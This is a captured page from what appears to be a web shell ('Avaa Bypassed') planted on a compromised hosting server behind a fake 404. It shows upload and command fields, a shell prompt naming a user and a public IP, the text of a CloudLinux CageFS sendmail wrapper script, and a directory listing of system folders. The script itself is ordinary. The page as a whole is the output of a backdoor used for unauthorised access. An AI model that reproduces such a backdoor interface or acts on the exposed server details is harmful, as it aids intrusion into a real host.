404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@13.58.73.59: ~ $
#!/bin/bash
##CageFS proxyexec wrapper - ver 16

if [[ $EUID -eq 0 ]]; then
    echo 'Cannot be run as root'
    exit 1
fi

USR=`/usr/bin/whoami`
TOKEN=`/bin/cat /var/.cagefs/.cagefs.token`
# It's user's tmp directory and write to it is secure procedure
# because this script is running only under usual user
PIDFILE="/tmp/.cagefs.proxy.$$"
USER_INTERRUPT=13
CWD=`pwd`

ctrl_c_handler() {
    if [[ -f "$PIDFILE" ]]; then
        pid=`/bin/cat $PIDFILE`
        /bin/rm -f $PIDFILE > /dev/null 2>&1
        /bin/kill -s SIGINT "$pid" > /dev/null 2>&1
    fi
    exit $USER_INTERRUPT
}

if [[ -e /var/.cagefs/origin ]]; then
    ORIGIN=`/bin/cat /var/.cagefs/origin`
    REMOTE="/usr/bin/ssh -F /etc/ssh/cagefs-rexec_config $USR@$ORIGIN"
    $REMOTE CAGEFS_TOKEN="$TOKEN" /usr/sbin/proxyexec -c cagefs.sock "$USR" "$CWD" SENDMAIL $$ "$@"
    RETVAL=$?
else
    trap 'ctrl_c_handler' 2
    CAGEFS_TOKEN="$TOKEN" /usr/sbin/proxyexec -c cagefs.sock "$USR" "$CWD" SENDMAIL $$ "$@"
    RETVAL=$?
    /bin/rm -f $PIDFILE > /dev/null 2>&1
fi

exit $RETVAL

Filemanager

Name Type Size Permission Actions
.build-id Folder 0755
NetworkManager Folder 0755
binfmt.d Folder 0755
cups Folder 0755
debug Folder 0755
dracut Folder 0755
environment.d Folder 0755
exim Folder 0755
firewalld Folder 0755
firmware Folder 0755
fontconfig Folder 0755
games Folder 0555
gcc Folder 0755
grub Folder 0755
kbd Folder 0755
kdump Folder 0755
kernel Folder 0755
locale Folder 0755
lsb Folder 0755
modprobe.d Folder 0755
modules Folder 0755
modules-load.d Folder 0755
motd.d Folder 0755
polkit-1 Folder 0755
python2.7 Folder 0755
python3.6 Folder 0755
rpm Folder 0755
sse2 Folder 0555
sysctl.d Folder 0755
sysimage Folder 0755
systemd Folder 0755
sysusers.d Folder 0755
tmpfiles.d Folder 0755
tuned Folder 0755
udev Folder 0755
cpp File 1.21 MB 0755
os-release File 381 B 0644
sendmail File 1.02 KB 0755